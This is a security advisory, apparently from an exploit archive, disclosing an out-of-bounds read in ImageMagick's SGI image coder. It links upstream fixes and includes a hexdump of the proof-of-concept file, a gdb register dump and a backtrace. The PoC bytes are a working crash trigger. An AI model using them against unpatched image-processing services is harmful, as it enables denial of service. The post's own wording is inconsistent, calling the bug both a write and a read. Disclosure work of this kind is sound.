Home / exploits ImageMagick SGI Coder Out-Of-Bounds Read Vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>ImageMagick SGI Coder Out-Of-Bounds Read Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Hi. This is PeiwenChen of Tencent's Xuanwu Lab & RayZhong of Tencent's Keen Lab. During our research, we found an Out-Of-Bounds write vulnerability in ImageMagick's SGI coder. When ImageMagick is identifying SGI format image, we can craft a sgi file with big value of row. It will read a certain number of times which is controllable by value of row, It cause an Out-Of-Bounds Read. The ImageMagick team has fixed the vulnerability we reported. Upstream fix: https://github.com/ImageMagick/ImageMagick/commit/7afcf9f71043df15508e46f079387bd4689a738d https://github.com/ImageMagick/ImageMagick/commit/8f8959033e4e59418d6506b345829af1f7a71127 Debian Bug report: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=836776 Attached is a proof of concept and backtrace. $ hexdump PoC.sgi 0000000 da01 0100 0000 fffe 0200 0400 000000c $ convert PoC.sgi Program received signal SIGSEGV, Segmentation fault. [------------------------registers------------------------] RAX: 0x0 RBX: 0x1 RCX: 0xf939 RDX: 0x6031b0 --> 0x0 RSI: 0x7ffff7fe8090 --> 0x1 RDI: 0x7ffff7dcef98 --> 0x1 RBP: 0xdfbc RSP: 0x7fffffff5e60 --> 0xffffffff54535254 RIP: 0x7ffff74eae8b (<IdentifyImageGray+795>: movss xmm0,DWORD PTR [r15+rax*4]) R8 : 0x744850 --> 0x0 R9 : 0x1 R10: 0x69a000 --> 0x0 R11: 0x1 R12: 0x641600 --> 0x600000000 R13: 0x6535f0 --> 0x1700000001 R14: 0x603178 --> 0x6031b0 --> 0x0 R15: 0x765000 <== end address of heap [---------------------------code---------------------------] 0x7ffff74eae7d <IdentifyImageGray+781>: inc BYTE PTR [rdx+rcx*1] 0x7ffff74eae80 <IdentifyImageGray+784>: mov DWORD PTR [rax],0x5177 0x7ffff74eae86 <IdentifyImageGray+790>: mov rax,QWORD PTR [rsp+0x30] => 0x7ffff74eae8b <IdentifyImageGray+795>: movss xmm0,DWORD PTR [r15+rax*4] 0x7ffff74eae91 <IdentifyImageGray+801>: movaps XMMWORD PTR [rsp+0x40],xmm0 0x7ffff74eae96 <IdentifyImageGray+806>: mov rax,QWORD PTR [rsp+0x28] 0x7ffff74eae9b <IdentifyImageGray+811>: movss xmm4,DWORD PTR [r15+rax*4] 0x7ffff74eaea1 <IdentifyImageGray+817>: subss xmm0,xmm4 [---------------------------stack---------------------------] 00:0000| rsp 0x7fffffff5e60 --> 0xffffffff54535254 01:0008| 0x7fffffff5e68 --> 0x0 02:0016| 0x7fffffff5e70 --> 0x63d600 --> 0x6535f0 --> 0x1700000001 03:0024| 0x7fffffff5e78 --> 0x614160 --> 0x1a9 04:0032| 0x7fffffff5e80 --> 0x0 05:0040| 0x7fffffff5e88 --> 0x1 06:0048| 0x7fffffff5e90 --> 0x0 07:0056| 0x7fffffff5e98 --> 0xfeff [-----------------------------------------------------------] Legend: stack, code, data, heap, rodata, value Stopped reason: SIGSEGV 0x00007ffff74eae8b in IsPixelMonochrome (image=<optimized out>, pixel=<optimized out>) at ./MagickCore/pixel-accessor.h:561 561 red_green=(MagickRealType) pixel[image->channel_map[RedPixelChannel].offset]- gdb-peda$ bt #0 0x00007ffff74eae8b in IsPixelMonochrome (image=<optimized out>, pixel=<optimized out>) at ./MagickCore/pixel-accessor.h:561 #1 IdentifyImageGray (image=<optimized out>, exception=<optimized out>) at MagickCore/attribute.c:683 #2 0x00007ffff74ebb7a in IdentifyImageType (image=0x6535f0, exception=0x614160) at MagickCore/attribute.c:821 #3 0x00007ffff7647d39 in IdentifyImage (image=0x6535f0, file=<optimized out>, verbose=<optimized out>, exception=0x614160) at MagickCore/identify.c:494 #4 0x00007ffff71024a6 in IdentifyImageCommand (image_info=<optimized out>, argc=<optimized out>, argv=<optimized out>, metadata=<optimized out>, exception=<optimized out>) at MagickWand/identify.c:336 #5 0x00007ffff7153e53 in MagickCommandGenesis (image_info=<optimized out>, command=<optimized out>, argc=<optimized out>, argv=<optimized out>, metadata=<optimized out>, exception=<optimized out>) at MagickWand/mogrify.c:183 #6 0x0000000000401cae in MagickMain (argc=<optimized out>, argv=<optimized out>) at utilities/magick.c:145 #7 main (argc=<optimized out>, argv=<optimized out>, argv@entry=0x7fffffffeb48) at utilities/magick.c:176 #8 0x00007ffff5a3b830 in __libc_start_main (main=0x4015f0 <main>, argc=0x2, argv=0x7fffffffeb48, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffeb38) at ../csu/libc-start.c:291 #9 0x0000000000401519 in _start () gdb-peda$ vmmap Start End Perm Name 0x00400000 0x00403000 r-xp /usr/local/bin/magick 0x00602000 0x00603000 r--p /usr/local/bin/magick 0x00603000 0x00604000 rw-p /usr/local/bin/magick 0x00604000 0x00765000 rw-p [heap] 0x00007ffff553f000 0x00007ffff5817000 r--p /usr/lib/locale/locale-archive Regards, Peiwen Chen Tencent's Xuanwu Lab </BODY></HTML>